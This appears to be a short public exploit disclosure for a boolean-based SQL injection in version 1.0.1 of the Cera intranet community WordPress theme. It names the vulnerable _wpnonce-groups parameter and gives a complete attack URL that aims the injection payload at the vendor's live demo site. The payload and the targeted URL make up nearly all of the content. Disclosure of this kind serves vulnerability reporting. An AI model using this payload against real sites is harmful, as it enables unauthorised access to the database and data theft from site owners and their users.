=========================================================================================== # Exploit Title: cera-intranet-community-theme SQL Inj. # Dork: N/A # Date: 29-12-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://themeforest.net/item/cera-intranet-community-theme/24872621 # Software Link: https://themeforest.net/item/cera-intranet-community-theme/24872621 # Version: v1.0.1 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: N/A =========================================================================================== # POC - SQLi (Boolean Based) # Parameters : _wpnonce-groups # Attack Pattern : https://intranet-dark.cera-theme.com/?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f%27/**/aNd/**/5468967=5468967/**/aNd/**/%276199%27=%276199 # GET Method : https://intranet-dark.cera-theme.com/?_wp_http_referer=/home/&groups_widget_max=8&_wpnonce-groups=45a424e69f ===========================================================================================